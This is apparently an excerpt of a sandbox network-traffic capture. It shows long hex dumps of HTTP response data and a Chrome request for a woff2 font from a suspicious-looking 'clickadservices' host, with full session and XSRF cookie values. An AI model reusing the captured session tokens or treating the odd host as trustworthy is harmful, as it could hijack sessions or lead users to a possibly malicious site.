                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 2a 4d a7 b7 68 2e cd a3 c5 b4 94 96 51 21 7d 42 c5 b4 9a d6 51 09 6d a4 4d b4 85 b6 52 1d 35 2a bf 4a 55 69 2a a8 f2 55 5f 35 40 5d ae ae 50 57 aa 81 ea 2a 35 48 0d 56 57 ab 6b d4 b5 ea 3a 35 44 5d af 6e 50 23 d4 18 35 56 3d a9 c6 a9 a7 d4 78 f5 b4 9a a0 9e 57 2f a8 89 ea 45 35 49 bd 04 8a 4e 56 53 d4 54 d0 75 ba 9a a1 5e 55 33 d5 5f d4 1b ea 6d 35 47 2d 50 8b d5 12 55 a8 8a d4 47 6a 95 2a 56 ab d5 a7 6a 8d 5a ab d6 a9 f5 6a a3 da 42 4a bd ca 5f 50 77 ca e3 30 f5 e2 66 2a 00 8f 96 71 13 95 f0 71 35 96 f7 aa 27 b9 46 3d 4d 49 6a 02 37 a8 e7 91 5e e0 66 f5 22 87 d5 4b 5c a1 a6 70 48 4d 43 de 74 a4 57 b9 5a cd 42 7a 9d eb d5 6c 94 2b c6 b3 b5 d4 85 ce 01 65 7c a0 8d 0f b5 1e a5 42 3e 8e 9a 0f a9 31 a8 61 2c f5 44 ed 45 6a 1c e5 a8 a7 28 a8 c6 93 4f 3d cd 95
                                                                                                                                      Data Ascii: *Mh.Q!}BQmMR5*JUi*U_5@]PW*5HVWk:5D]nP#5V=xW/E5INVSTu^U3_m5G-PUGj*VjZjBJ_Pw0f*qq5'F=MIj7^f"K\pHMCtWZBzl+e|B>1a,DEj(O=
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 3a 4f d6 e1 0d 70 0b f4 8a e0 9c a5 69 07 3a 1f c1 db c9 f0 f2 79 f0 13 cb e0 fb fc c6 27 ed b7 bd 3d ac 5d 21 b0 b3 ad 2e f0 04 b6 61 ad 5b 68 b9 10 b6 63 0c 3c e1 58 d8 86 27 79 35 f4 ca 6f ac ef 26 d1 a5 c9 90 86 a9 90 f9 69 22 b5 b0 ba d0 e2 57 91 3f 13 16 73 16 f2 6d 3b a2 71 98 0b 1d 50 b6 05 84 34 c3 fa 42 92 0b d0 aa e6 6b 37 48 d4 71 d4 7f 5c fc e1 04 d0 60 32 d2 62 78 80 25 48 ef 23 2d 43 fa 00 e9 23 3c d7 5a b0 1a e9 53 d4 8f 5e 2b 44 95 6a 23 d2 56 cd 69 60 9a 05 8c 2c 48 45 12 da 1b 83 de 2a b5 1c 12 aa 5c 49 a8 43 cf ab 5d 39 3a 6c ee 2c 91 23 94 c2 73 4d 5d 0b 3c b2 0c 7d d2 9d a7 f0 54 bd 78 ab a3 2d 42 73 e5 bc c7 db 28 69 e8 49 1d e1 0e 9b 78 fb 40 7a 88 ee 43 9c 7c 14 3c 48 e2 30 b0 b0 50 3e 85 9b 00 90 39 66 ae e7 1a 5c eb d4 44 1d f2
                                                                                                                                      Data Ascii: :Opi:y'=]!.a[hc<X'y5o&i"W?sm;qP4Bk7Hq\`2bx%H#-C#<ZS^+Dj#Vi`,HE*\IC]9:l,#sM]<}Tx-Bs(iIx@zC|<H0P>9f\D
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 3e 23 ce b8 34 d4 96 47 4a c0 1c 9f 8f df e5 cd bc 08 e7 46 48 4a 19 62 c7 32 7b 4d 8f 27 ea 39 53 c8 f9 2e c8 fb 5e f8 a8 23 b2 9f 23 cc ab 0d ae 13 e5 b7 02 b1 e4 5e f3 64 25 c6 59 47 79 27 57 f2 6b bc 9d 17 71 0d 4a ef 32 29 64 e6 07 fd c8 0d f3 6c fe 2b ea 6c d0 ad f1 3a ea 09 3a e4 f0 74 68 df f6 d3 90 93 1a b3 57 63 bf f6 a8 68 37 cc 27 a1 a7 e9 68 b5 0a d7 0d 7a 3f a4 94 39 89 9e 85 1d 49 32 eb 54 3a bf 41 ae cc 6c 1f 3c b0 de 37 67 8f 01 8f 00 b7 9a d8 75 4d ae b4 25 0e 6d c9 3b f6 1e 10 a1 d8 5e b4 54 8d f4 85 ec 5f 3c c5 11 ab 67 ec 5a a7 77 cc a0 be 2e da da c8 b5 a6 d6 49 b3 93 c6 2e d5 d8 b6 7c b8 e5 6a 65 1e 2d 26 9e 73 c6 8d ba d7 72 11 33 17 78 ea 78 9b f2 7a bd 63 8f e7 be d6 9e 05 06 7e 56 cb f9 53 af e7 75 f5 d5 9d 99 42 1f ab c8 ec 09
                                                                                                                                      Data Ascii: >#4GJFHJb2{M'9S.^##^d%YGy'WkqJ2)dl+l::thWch7'hz?9I2T:Al<7guM%m;^T_<gZw.I.|je-&sr3xxzc~VSuB
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 7b e6 31 7c f1 f7 3a b4 90 97 c3 ed 7d 71 d3 6e 84 68 79 ca f8 dc f1 8a 13 b3 46 8f 64 ca 90 57 04 ab fe 26 a2 a8 50 fc 31 a1 ac 4e 26 47 7d ab d2 e0 91 b2 86 88 7e c1 3e ae 8b 79 fb 60 7b 74 8e 13 fd 1f a1 b3 e5 e6 42 d7 57 d7 da bb 7d 81 6b 5b d1 7d 72 64 14 2e ba aa 47 10 8d d1 a3 4d c7 ea d9 76 a6 e5 08 d2 b5 51 8b 62 2d 64 94 25 38 e2 68 b6 89 9d c2 90 ce 46 91 fc d0 e9 7f 67 e7 e0 e8 ac fc 49 8d 8d 1a e2 cf e2 c4 e7 7f 04 5b 89 fb 43 d1 f2 e2 8e f9 8e da 56 c1 9e 6f 30 cf f6 9d de 6c 27 de 0b c0 7b d6 e9 55 03 53 4b 46 dc 79 a3 06 ef de 88 a8 16 bc 71 e4 0e 89 15 da 90 f5 76 e5 3d e8 ed 4d d4 ea 96 2f 6e 44 fe 1c 6c c5 94 f8 6b ab a2 c9 2d f7 76 46 bc 59 93 3b f7 a7 ef 8b f8 9d f6 c6 98 ed e4 57 23 a6 aa 8e b6 ef 90 f6 da d6 77 95 44 d1 53 09 2e cd
                                                                                                                                      Data Ascii: {1|:}qnhyFdW&P1N&G}~>y`{tBW}k[}rd.GMvQb-d%8hFgI[CVo0l'{USKFyqv=M/nDlk-vFY;W#wDS.
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 70 bb 01 8d f1 0f 5c 20 73 e7 f4 80 90 ec 7e 38 f0 a3 56 e0 c7 e8 e3 7d d2 4f 07 7e 26 30 b2 0d b8 df c0 03 2e 8c 72 e1 9b 3a 86 21 ce e9 26 ff 3e ac d3 30 c0 1d f4 8f 92 d2 69 00 75 81 cf f2 23 ea ba 0d 25 6f 13 b8 0c de f1 3c ba 07 d0 03 5e e4 7c ba 40 f4 b7 2b d9 bb f2 f4 57 71 69 64 ff 53 f4 70 99 b5 89 9e 99 f1 fe 4b 90 d6 75 a2 3b 01 57 d2 39 f4 5d fa 07 3a 13 d1 db c5 d0 7f e7 4b e9 db 4c bb 67 9b ef 91 cf d2 91 9c 1c ff 24 a0 b5 74 03 28 ab 50 d3 19 48 fd dd 73 92 b9 b3 ef 75 3a 07 ba da 43 fe 97 ef 7c e8 aa 4f 56 06 94 bc d9 1f cf 73 64 9d f3 76 48 59 7f c1 aa 7f 14 a8 36 41 d7 e4 40 ff 56 a1 ad 12 49 1e 7c e3 bd 13 0b dd 4d fe 39 2e 24 0b f4 68 03 2c 03 29 2e f8 0c e8 9a fc a0 71 2a 24 40 ff 3b e4 b9 b8 d6 2b d1 67 02 ce 36 d7 f9 22 1f bd 21 0d
                                                                                                                                      Data Ascii: p\ s~8V}O~&0.r:!&>0iu#%o<^|@+WqidSpKu;W9]:KLg$t(PHsu:C|OVsdvHY6A@VI|M9.$h,).q*$@;+g6"!
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 39 21 b9 6e ac 3b c1 9d ee 2e 76 33 dc 15 ee 2a 77 83 bb d9 dd e7 1e 74 0b dd d3 5e 4d af 8e e7 7a 3e 2f ca 6b e9 75 f0 62 bc a5 de 0a 2f cb cb f6 d6 45 d6 8a f4 45 46 45 4e 8b 4c f6 39 be 70 5f 15 5f 75 5f 1d 9f eb 6b e6 eb e2 8b f3 3d d4 78 7b d0 09 56 fc 65 d3 59 e7 6c 68 71 b1 e9 f3 68 41 07 6e a4 2f 03 4c d7 60 46 90 ca 72 b2 58 c3 7a b9 a6 2b cf 74 fd a0 33 4e 44 a9 ae 2d 4e 41 a9 ae 18 37 d1 9d e6 2e 74 d3 dd e5 6e 96 9b e3 e6 b9 7b dc 7c f7 47 f7 94 57 c3 8b f0 ea 79 9e e9 6a e1 b5 2f d7 b5 f2 5f 75 55 fb 8b ae 81 a6 8b 60 a8 e9 52 99 2e 4d 84 e2 4d a6 2f 86 58 3a f1 f7 51 07 8a 8e 96 dd 16 0d 2b 1a 54 94 04 e7 22 8a ea f2 9f 23 98 50 be 0e 0e a6 06 63 83 93 03 e7 82 04 ce 04 7e 0d 14 06 32 02 63 02 ab 8f 3f 75 fc 49 ff 01 7f be 7f 07 f8 73 fc ab
                                                                                                                                      Data Ascii: 9!n;.v3*wt^Mz>/kub/EEFENL9p__u_k=x{VeYlhqhAn/L`FrXz+t3ND-NA7.tn{|GWyj/_uU`R.MM/X:Q+T"#Pc~2c?uIs
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 5f 63 dd ad 18 fe a6 ff 2f f7 e0 48 1c b2 5f b8 86 07 10 29 77 0d 94 bb da 56 ae 12 b2 a3 52 05 42 25 2a c4 14 33 04 30 9f 14 5e 4b 90 15 6a 35 2d 17 f1 e9 d1 c8 8c 10 b7 07 f7 7c d3 af d8 6b dd ed c3 7e 30 12 fb 17 34 1b 0d 60 54 b1 df fa a9 f5 63 20 86 c1 4c 3a c3 70 bf e7 87 a0 95 ae a4 74 86 83 52 38 d4 c4 23 96 f5 2c c3 50 ba 17 53 ce 30 ae 2e 00 50 aa d5 6a 85 52 1b 8f 90 9e d5 b1 7a a4 65 75 f8 2d ac bd b6 ce 7a b1 ff 71 ec 9f 37 82 ee f0 43 77 d6 a3 32 e1 06 3f f4 99 35 07 ca 67 99 f7 a1 fc 9d 50 be 0f 13 ca c4 30 53 2d d9 2e 88 c7 84 7e cc 00 53 f9 46 86 65 09 e9 8c 67 99 12 71 1c e1 0e f2 42 e5 e1 61 be 9a 68 7d 58 4c 78 4c 48 90 26 d4 37 34 31 42 05 cd d2 e8 52 c3 b0 9f af 42 e9 ef ef e7 eb 89 f5 3a 94 9a 87 d3 d3 62 f4 3a 35 4a cd 10 7f 79 1f
                                                                                                                                      Data Ascii: _c/H_)wVRB%*30^Kj5-|k~04`Tc L:ptR8#,PS0.PjRzeu-zq7Cw2?5gP0S-.~SFegqBah}XLxLH&741BRB:b:5Jy
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 45 5b 6e 74 ff e5 22 3a 74 e6 cc b9 53 7f e5 87 cc 6d c7 17 37 9e 58 9a 61 3d 8f bf da d6 df b7 4b 50 42 bd 3d a3 67 f9 eb c0 1f 2d 93 c4 58 2c 53 c3 42 43 82 7d 78 cc fa 69 c0 20 c0 a5 be 64 0a 9e 9c 65 81 01 88 31 44 07 24 05 26 01 cb b4 48 3b 39 cb 94 5a a5 81 b0 2d c3 6c 30 6b 33 32 c6 f1 0e d9 78 46 3e e7 ce fa d1 f2 57 cb 5e e9 9d 37 9c fe 79 f7 27 e9 a9 c0 3b 67 3c 3c 26 dc 5d f2 a3 e6 57 cd 53 8f 19 a3 3f 6f fc a4 ec ad c9 78 79 1f 9d 93 83 99 54 4b 12 0b 76 02 99 91 c5 a9 bf 11 b4 36 5b cb d8 4d ff be 9a a0 00 4d b0 6f b0 4e 3d cd 57 09 52 85 60 06 06 51 8d 8c 84 e9 16 f4 06 30 58 9e 7d b9 85 f7 df 83 ba 5f 10 1e 67 15 ac 70 e7 22 7a b2 f3 d1 f5 d3 05 c3 d1 fb ce 1f 12 04 f6 ee ee 1f c5 58 d7 e3 55 d6 fd c0 ec a5 87 85 c7 b6 f6 f6 0e 0a be 54 a6
                                                                                                                                      Data Ascii: E[nt":tSm7Xa=KPB=g-X,SBC}xi de1D$&H;9Z-l0k32xF>W^7y';g<<&]WS?oxyTKv6[MMoN=WR`Q0X}_gp"zXUT
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 65 66 58 28 56 91 e1 64 93 29 7b 49 42 60 ed 03 9f cb 18 22 48 2e 36 7a 83 03 35 3e 6a 6f 2f 4f 0f 91 68 05 13 81 22 5c c7 a8 b6 1b 5a 7e 9e ec 18 e9 ec db 4d dd c5 79 d6 39 63 8e 50 de 92 69 ba a9 29 09 85 41 a5 86 35 c2 9c ee ea a2 0d 46 69 bc 85 9e 62 63 a7 96 c5 98 32 8d fa e9 a6 3c 42 73 99 50 85 5d e8 fc 01 d6 90 c6 c7 45 c1 51 25 20 cf 23 ac 8d 3a 6f 4f e0 23 cc 22 dc 18 45 30 7d 8c e3 61 54 6b 6f 99 e5 62 75 53 ae 29 61 46 48 99 b1 47 a8 5a 59 5b d6 17 45 d8 15 d2 5b 98 91 13 6d 98 9e 99 4d e6 2c a1 8a ce 59 09 c4 8f 57 20 c4 c6 c5 42 3f e2 52 e2 72 d2 99 8f 8e 3e 6d 19 58 10 76 dd 69 88 0e 0c f0 d3 78 7b b9 2a 99 04 94 60 d7 9d 64 90 39 ce 6a 0a a5 82 fc df 8e 4b 47 9b 7b e3 a6 f8 4f 09 1c 20 73 dd fd cf ff e0 dc c5 92 32 5d 71 74 62 a6 25 2d c1
                                                                                                                                      Data Ascii: efX(Vd){IB`"H.6z5>jo/Oh"\Z~My9cPi)A5Fibc2<BsP]EQ% #:oO#"E0}aTkobuS)aFHGZY[E[mM,YW B?Rr>mXvix{*`d9jKG{O s2]qtb%-


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      38192.168.2.1649753104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:48 UTC1525OUTGET /56GlYvF8v8vmR1Rn676aHEust55 HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      Origin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: font
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQ
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6IkJackFUR0FORlRxQi9zV0xnS1E1d0E9PSIsInZhbHVlIjoiQ2pvanByVlJlV04wb3B2S3ZvZlhodkRXYUliNFJ0T2h5QWpIeTVPdXo3YjNpeGp5M0pQek8vQURWQkFQaTUrWEZZVm5yQ01iMnQzQklpaDU5eWdIRE9wRUJEQ2EvcWQwZ1dEWDFXc2JzekJLSWZ3UUo2RWVrS2ZEUzkzc25LeGciLCJtYWMiOiI0ODJhNzVhMmE1MTJkNmY2ZTY0OWY0NjBmYTk3YjZjOThmZjAyZTAzZTdhNGI3ZjE3MWQzMzdlNGU5NGQ4ZDgwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImFqZ2NDUnQ2UDJTa2dUSnUzNzlwZXc9PSIsInZhbHVlIjoiU1lJSFpWdUJsYmRZVGVQUW1BQmJiN09Odk9FRlNjbXIrWWVyU3AxN1ZWSGZJWG9UOVgwb0dUTEVRSUZiVXJ2WktBdGZ6REJidVVuZ2d3UjRpMEJyMVBRSjRIUzB3YWp5MGRmK1Axa0U0L0d6Y0lZM2pUWjhFVnY1VkFnT1VRc0giLCJtYWMiOiJiOTkyYzRiOTc1ZDU4MjVkNzIyYmY2NDRkM2YwMDBmNTVlZmYwYTlhYzVjNzhiOGI3ZjRhNWYwZGI2MWVmYTI3IiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:48 UTC622INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:48 GMT
                                                                                                                                      Content-Type: font/woff2
                                                                                                                                      Content-Length: 28584
                                                                                                                                      Connection: close
                                                                                                                                      Content-Disposition: inline; filename="56GlYvF8v8vmR1Rn676aHEust55"
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4%2BZbCujLNDOKYSo85FXqSpJrszLANA0OwlOEVLF8NVrU3YzwYqPG8kLxMd7F%2FswmHbEiFSYYhtZwGpN3UM5jA1%2BNDBvJTYHZ9gJOh7KUEExsHQVVxfmVD4b0IEFbmg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b8a5e7f9b56-SEA
                                                                                                                                      2024-05-08 18:12:48 UTC747INData Raw: 77 4f 46 32 00 01 00 00 00 00 6f a8 00 10 00 00 00 01 36 78 00 00 6f 47 00 01 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 81 bc 3e 1c 89 16 06 60 00 8e 3c 08 3c 09 97 62 11 08 0a 82 c0 68 82 a2 42 01 36 02 24 03 8e 78 0b 87 3e 00 04 20 05 8c 27 07 97 7b 0c 81 0d 5b 78 22 71 04 dd b6 5d c4 a2 0a ca 1b ec 97 68 4a b7 df b3 0a d8 b1 27 dc 0e e2 ce 96 b5 c5 0a 36 ae 32 bb 5b 95 0a ec 05 71 f6 ff ff 7f 7a d2 88 b1 6d 43 77 77 ff 00 08 2a a9 65 55 b0 0a 53 9a a2 10 14 ad 17 8a 9a 11 30 8d c1 53 1a 73 a6 e1 b6 2c ad b0 c2 e4 5c e5 65 96 de 46 b1 26 ef 94 d7 16 8d 6f 55 2a 52 1a 7d 51 f7 43 8e e7 32 b9 54 44 c8 b6 e1 0a d3 35 11 09 23 e7 fa 68 14 48 a4 32 ac 7c 3c e8 31 a3 7a a7 a2 5d cf 78 5a f4 95 0f 7a 9d f0 7a b2 e4 97 57 f8 13 be d9
                                                                                                                                      Data Ascii: wOF2o6xoGB>`<<bhB6$x> '{[x"q]hJ'62[qzmCww*eUS0Ss,\eF&oU*R}QC2TD5#hH2|<1z]xZzzW
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 00 9e 7f f7 d3 db e4 35 29 e5 97 60 00 e0 77 26 a7 ec 8c 51 bd 04 a5 aa 2d c9 13 20 11 06 0d 39 e4 58 74 9e 2f 53 51 3f 14 73 2b 75 0c 39 ee 1f 5c b1 68 d4 6c b0 47 cb 23 fc 2a a7 d5 23 40 83 46 d2 88 c9 66 c5 31 84 66 01 9d 3d 60 1f f0 e3 f1 70 ca 0b 01 a0 c2 94 3d 63 f0 be d9 92 66 3d 9c eb 70 20 34 42 79 0e 75 ff 7a 27 cb 0f ee 24 3b 04 73 b6 a4 dd 16 db 7a d0 f6 e3 e3 12 58 be c5 6e 36 79 2d e0 06 b4 05 18 a1 7f b4 fd cf 8a 12 3c cd 09 17 b1 bb 1d be 58 9e 81 7f 85 04 cd 7e 2b 6a 8a 7a bb 6a b2 f8 ff ee f7 db c0 37 f0 50 44 93 b8 4f 10 d5 77 d1 fa 39 9d 90 38 5d 13 21 7e 43 26 98 18 b4 cd d0 fb 13 2a 4c 43 45 d3 dc 4e 66 7e af 4e 9f 65 4a fa 69 58 6e 58 2a 43 81 26 e6 f5 bf 8b 74 b6 55 83 fc 4e 72 d2 40 91 b6 6c 5a b0 80 a7 03 20 d9 8f 58 b9 a2 c8 93
                                                                                                                                      Data Ascii: 5)`w&Q- 9Xt/SQ?s+u9\hlG#*#@Ff1f=`p=cf=p 4Byuz'$;szXn6y-<X~+jzj7PDOw98]!~C&*LCENf~NeJiXnX*C&tUNr@lZ X
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: ef 69 9d 44 eb 95 0e 88 ec 30 d0 66 50 36 51 17 59 8c ca 45 0b 23 fa 81 55 bc 59 5f 55 fe a0 40 a1 20 35 57 9b d4 3c b9 b3 29 ed a7 16 d3 13 45 0b c5 4c 25 f1 30 23 97 d9 4e bd 28 ab 1d d0 c2 14 6f c9 61 f9 56 40 1e 2b aa 69 29 e1 5a 15 f9 c1 0e 10 e8 40 d0 3a 0c 29 8c a9 39 12 e8 b0 01 e8 f6 ee 52 ab d2 f0 06 94 a4 e3 89 30 00 08 57 44 ed a2 83 bc a0 e0 07 54 5b 4d 54 db a3 29 51 e2 43 bf 56 c9 5a 96 e8 1f 92 c0 20 b0 78 90 51 a2 3c 19 06 e5 c4 18 b4 51 95 16 6c ec cd a6 0b e6 b6 d1 db 00 56 0c 1e a0 cb a0 80 03 02 ba eb e2 92 60 fa 62 ea 87 59 4d 58 29 3a 30 36 0c 02 ce fb 12 0a 67 57 cf 6d 7c f0 81 96 93 88 02 ba ef 92 55 dd 8c f9 fa 69 f2 71 0c 59 37 73 08 39 5d ce e5 85 bb 59 16 bd 18 b4 30 75 01 f3 09 a6 26 0f af 55 73 55 f9 8b 2d cb f9 49 0a 03 cd
                                                                                                                                      Data Ascii: iD0fP6QYE#UY_U@ 5W<)EL%0#N(oaV@+i)Z@:)9R0WDT[MT)QCVZ xQ<QlV`bYMX):06gWm|UiqY7s9]Y0u&UsU-I
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: fb bf fc 8c 82 bb fa 9b 75 db a1 66 75 c9 75 d3 64 f1 8c aa ea bf de f8 8f 20 f3 86 3a ba e8 43 54 6a 8a 28 69 af 3c e6 ea b6 b2 5d 1b f8 18 09 92 64 e8 bd 0a 1d e0 d3 ba bc 10 cc cb 06 57 5c 77 bd a9 1a 44 81 23 b1 00 73 e8 10 9d bc f0 cc 39 be 92 1c 86 29 96 14 29 84 bf f5 e6 98 7e 7c d5 7f bf fc c3 77 d3 3c 9d cf ff 57 80 cf 97 9a d9 60 5e bd 00 ef d9 ff 57 bb 7c 10 17 61 91 5f e2 e0 bf 67 17 38 6d 72 f7 c0 87 b9 c7 2b b1 0e 4b b1 bd 52 1c c4 78 e7 87 af ff f6 09 93 1e 60 d4 16 c7 bd 7b 90 2e ac c4 27 6b 93 0d 57 9e 7c 28 0f 5c f9 c6 1c d3 b8 97 5b 0f 28 3e 06 4b ae 4a 42 c2 63 6d 65 b3 87 f4 02 73 e9 ec 31 94 dd 4d 35 43 9e 82 ef 1a 19 ca 1a de 11 5a 06 1e 1c 66 50 e3 92 33 b2 78 9f 06 fa de d0 77 b9 e5 f7 d4 e5 a7 d9 89 be 67 54 d4 43 9f 16 46 78 01
                                                                                                                                      Data Ascii: ufuud :CTj(i<]dW\wD#s9))~|w<W`^W|a_g8mr+KRx`{.'kW|(\[(>KJBcmes1M5CZfP3xwgTCFx
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 37 5f 5d ca 6d 2a c2 93 2c 7c e1 4f 0a f5 78 68 ed f3 95 63 92 85 c2 64 da 80 92 57 22 90 60 5c e2 76 78 80 a3 e7 17 e6 65 84 d8 68 fc 45 39 36 9d b6 bd 10 a7 d5 3c 40 98 a4 95 3d 2f 5c b2 3e 4f 05 c0 c6 03 43 4f 91 c1 b6 2a 1c ab 73 0f 48 30 21 8e 1a d3 24 e5 69 1b 45 37 55 e3 c4 1b 70 81 70 c6 8e c3 c7 15 fd d0 6a 42 d4 1a 9b 2c 71 78 1c 68 90 8e 66 52 12 59 39 ec 05 60 4b 10 46 0a d3 3b 4f 93 e9 9c 42 34 fe 5a 4c 23 c9 da 61 da ca b0 2e 42 bf ba 4e 43 ee 7b a5 b6 cd 10 a9 9e d6 76 c2 da 8c 75 0b 16 88 a2 6a f6 21 ff 46 59 15 b1 d8 a4 ae 93 c7 8f 9e 79 f0 b8 5e 0d 87 be b3 43 8a 3b 87 21 5b ce a4 5d 92 b7 f9 a1 38 f5 96 d0 8b c3 0e d8 3d be 24 30 f0 11 92 c4 5c c9 d4 f5 38 62 51 c4 09 ab 9c ee 74 c2 1d 9d 3f 80 6f 2b ee d5 47 d6 5b 60 91 6e 70 0d bf 4e
                                                                                                                                      Data Ascii: 7_]m*,|OxhcdW"`\vxehE96<@=/\>OCO*sH0!$iE7UppjB,qxhfRY9`KF;OB4ZL#a.BNC{vuj!FYy^C;![]8=$0\8bQt?o+G[`npN
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 91 05 2e 44 bf ef c7 df 5e 30 2e a5 1f cd 43 40 1e 70 cc f3 0a 36 82 72 f9 89 38 79 b0 a5 24 70 54 fe 74 60 c5 01 22 5e b9 e6 19 a1 43 02 57 17 2b 13 89 c3 3d af 86 3d 5b 59 ec d0 9d 86 23 f9 67 f1 fb 3a 58 07 48 c6 63 87 75 a2 a8 0c 94 5b bc 1e 8e 82 53 19 0c 24 da 49 3c 17 4c 27 29 d9 9d 80 57 5a ab 4f 76 b1 d5 d5 66 d6 cd 0b 43 de c4 07 9d fb 6a 3d 35 5d 05 18 4d fc cf f3 d5 52 8a 37 07 16 7b c0 bd 19 bc 8f 5b ba 06 00 c5 83 23 de f6 d2 01 41 b8 02 01 50 23 69 24 5c 1c ef 34 bf 27 04 01 13 5c 88 a0 4a 93 f8 12 79 bb a9 68 e7 2f 4d 81 05 1e 94 a0 46 8b ee 74 70 0e c0 c0 06 bf 4a a1 4d 9b de 6d 3c 06 38 10 40 08 15 1a b4 ec f1 81 bb 5f 18 f6 cc 77 10 ea 8d 43 df 85 0f fd 36 f8 e2 04 f8 bf 37 77 9c 81 9f e8 12 4f 3f 5c fa 4a 33 6a 34 14 cd b7 3d 06 0f be
                                                                                                                                      Data Ascii: .D^0.C@p6r8y$pTt`"^CW+==[Y#g:XHcu[S$I<L')WZOvfCj=5]MR7{[#AP#i$\4'\Jyh/MFtpJMm<8@_wC67wO?\J3j4=
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: e9 89 d1 1b ab 7b 8a be a9 a2 c5 b8 43 ea 57 b3 bc 10 37 82 25 84 7d 6c eb e6 e6 16 e5 cc a2 be 5d 7f 9c 81 78 43 89 26 d3 24 7b 66 a6 e7 a6 78 6a 9a 55 d3 3d 36 c3 13 cb bc b7 a6 03 56 fb 2f cd 7d 12 13 c0 38 5c 55 a0 e1 24 e3 29 0d 8d ab 57 ae 5a f3 da 99 73 6a ff 83 13 79 f9 de ad a4 cd b6 da 6b 75 de 3c 4e 5d ab ad 29 8e bd e8 f4 90 28 0f 5f 6c f3 f3 71 f4 b1 c7 9f 78 f2 a9 a7 9f e1 41 ca f5 83 8e 3b ef 36 73 5a b5 d9 a6 5d 87 4e 5d ba f5 da 6e 87 9d 76 d9 6d 8f bd fa ed 33 f0 8a 1f 7c f0 73 cd 61 47 f8 86 14 f4 d9 05 4a 43 a1 a2 d7 e1 81 fb 1e 7a e2 b1 e7 3e fb e6 2b 1b 30 fb 13 00 f8 c0 06 e0 02 9b 00 1e f7 07 3f 94 ea cb 9c fd 8a 07 b7 5f 72 79 43 e1 99 99 f9 af 64 20 e2 d5 4f f8 1a 9f 0f 45 87 ab 6f b8 e5 b6 3b 6e 6a 3e 07 38 ea e2 92 3d 6f 53 e8
                                                                                                                                      Data Ascii: {CW7%}l]xC&${fxjU=6V/}8\U$)WZsjyku<N])(_lqxA;6sZ]N]nvm3|saGJCz>+0?_ryCd OEo;nj>8=oS
                                                                                                                                      2024-05-08 18:12:48 UTC1369INData Raw: 2d ab af a9 57 67 f7 51 bd 61 37 69 bc 69 4b 76 78 bf 58 39 1e 64 1d 8e 2d 52 6f f1 43 6b ea a6 58 f8 13 68 45 70 b2 db 5a 4d d1 66 ac 0c bc b8 74 db ad f6 4c df 84 10 7c 9b 9c ea 48 0d 9c 0e 4c d5 de a5 81 a8 4e 91 7e be 3d c8 de d1 df a1 59 98 3a 2d 47 0e ae f9 33 c0 16 17 db ed 6f c8 04 34 b3 31 0a 82 b1 49 41 13 32 21 98 26 40 6b 46 10 cc 4d d0 02 82 65 02 75 ad 08 82 b5 09 da 40 b0 4d 80 d2 8e 20 d8 9b a0 03 04 c7 04 5a 3a 11 04 67 13 74 81 e0 9a 40 43 37 82 e0 6e 82 1e 90 ef 09 85 af e3 7e 79 b3 a8 3c 1f af a3 ea b7 59 3a 65 d4 f0 e9 2e 26 f6 67 88 bf 3c 17 fe 4a 7d 86 6f b3 d4 df 1f 89 7f d8 c2 3f 29 f0 6b 96 fb f7 23 f1 1f 5b f8 2f 05 29 b5 c1 3b 3f f9 d3 9d 6f 74 4d 92 6e c1 9b 60 e7 5b 3f ce 93 de be b6 0e 52 ab 33 bf 5e c8 c7 d5 43 95 3d 57 f1
